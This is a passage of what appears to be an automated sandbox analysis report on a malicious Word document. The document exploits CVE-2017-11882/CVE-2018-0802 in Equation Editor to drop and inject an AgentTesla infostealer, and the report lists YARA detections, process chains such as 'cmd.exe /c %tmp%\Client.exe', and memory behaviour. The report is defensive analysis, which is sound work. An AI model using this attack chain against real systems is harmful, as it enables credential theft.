                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_005A4EB810_2_005A4EB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_005ACC3910_2_005ACC39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A87DA810_2_00A87DA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A865D010_2_00A865D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A89E8610_2_00A89E86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A8CEF010_2_00A8CEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A803D010_2_00A803D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A8D23110_2_00A8D231
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A8725810_2_00A87258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A80F8010_2_00A80F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00B0536010_2_00B05360
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 12_2_0021206812_2_00212068
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 12_2_002128C012_2_002128C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0028B07015_2_0028B070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_002842A015_2_002842A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0028CBD815_2_0028CBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00289CF815_2_00289CF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0028D58515_2_0028D585
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_002845E815_2_002845E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0028A5F015_2_0028A5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00284EB815_2_00284EB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0028B20D15_2_0028B20D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00817DA815_2_00817DA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_008165D015_2_008165D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0081A13115_2_0081A131
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0081CE5015_2_0081CE50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_008103D015_2_008103D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00819D8815_2_00819D88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0081725815_2_00817258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00810F8015_2_00810F80
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 20_2_0026206820_2_00262068
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 20_2_002628C020_2_002628C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_003FB07021_2_003FB070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_003F42A021_2_003F42A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_003FCBD821_2_003FCBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_003F9CF821_2_003F9CF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_003FD58521_2_003FD585
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_003F45E821_2_003F45E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_003F4EB821_2_003F4EB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_003F264C21_2_003F264C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_00C265D021_2_00C265D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_00C27DA821_2_00C27DA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_00C2CE5021_2_00C2CE50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_00C29E6C21_2_00C29E6C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_00C203D021_2_00C203D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_00C20EDB21_2_00C20EDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_00C2725821_2_00C27258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_00C20F4521_2_00C20F45
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_02094DA821_2_02094DA8
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77620000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: 77740000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77620000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77740000 page execute and read and write
                  Source: ICPO07082299976.doc, type: SAMPLEMatched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: ICPO07082299976.doc, type: SAMPLEMatched rule: rtf_CVE_2018_0802 author = Rich Warren, description = Attempts to exploit CVE-2018-0802, reference = http://www.freebuf.com/vuls/159789.html
                  Source: ICPO07082299976.doc, type: SAMPLEMatched rule: rtf_cve2017_11882 author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
                  Source: ICPO07082299976.doc, type: SAMPLEMatched rule: packager_cve2017_11882 author = Rich Warren, description = Attempts to exploit CVE-2017-11882 using Packager, score = , reference = https://github.com/rxwx/CVE-2017-11882/blob/master/packager_exec_CVE-2017-11882.py
                  Source: ICPO07082299976.doc, type: SAMPLEMatched rule: CVE_2017_11882_RTF date = 2018-02-13, author = Florian Roth, description = Detects suspicious Microsoft Equation OLE contents as used in CVE-2017-11882, score = , reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 9.2.Client.exe.3169510.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 9.2.Client.exe.3169510.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 10.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 10.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 9.2.Client.exe.3169510.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 9.2.Client.exe.3169510.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 00000009.00000002.932287438.0000000003109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 00000009.00000002.932391087.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 0000000A.00000000.926194509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: Process Memory Space: Client.exe PID: 2348, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: Process Memory Space: RegSvcs.exe PID: 2656, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
                  Source: ICPO07082299976.LNK.0.drLNK file: ..\..\..\..\..\Desktop\ICPO07082299976.doc
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO07082299976.docJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@21/15@9/5
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drOLE document summary: title field not present or empty
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drOLE document summary: author field not present or empty
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drOLE document summary: edited time not present or 0
                  Source: ICPO07082299976.docReversingLabs: Detection: 73%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c%tmp%\Client.exe A C
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c%tmp%\Client.exe A C
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe" Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c%tmp%\Client.exe A CJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c%tmp%\Client.exe A C
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR514A.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdb source: Client.exe, 00000009.00000002.928225350.0000000000530000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: c:\Users\Administrator\AppData\Local\Temp\2\Microsoft.CodeAnalysis.Orchestrator.RunnableProjects.Localization.pdb source: Client.exe, 00000009.00000000.911511848.0000000000AC2000.00000020.00000001.01000000.00000003.sdmp, Client.exe, 0000000C.00000000.973051510.0000000001233000.00000020.00000001.01000000.00000003.sdmp, ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.dr, Client.exe.0.dr
                  Source: Binary string: C:\Users\user\Desktop\RealProxyFlagsBadSignature.pdbd source: Client.exe, 00000009.00000002.928225350.0000000000530000.00000004.08000000.00040000.00000000.sdmp
                  Source: ~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Source: Client.exe.0.dr, CodeAnalysis.Orchestrator.RunnableProjects.Localization/????????????????????????????????????.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 9.0.Client.exe.ac0000.0.unpack, CodeAnalysis.Orchestrator.RunnableProjects.Localization/????????????????????????????????????.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0018C8F8 pushfd ; retf 0018h2_2_0018C95D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A8E0A3 push es; retn 0000h10_2_00A8E0EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A8F0E8 push cs; retn 0000h10_2_00A8F0EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A8E0F3 push es; retn 0000h10_2_00A8E13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A8E053 push es; retn 0000h10_2_00A8E09A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00A8E189 push es; retn 0000h10_2_00A8E18A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00B05360 push edi; retn 0000h10_2_00B05FCA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00B008C8 push ds; retn 0000h10_2_00B00902
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00B00820 push ds; retn 0000h10_2_00B00822
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00B00828 push ds; retn 0000h10_2_00B0086A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00B00871 push ds; retn 0000h10_2_00B00872
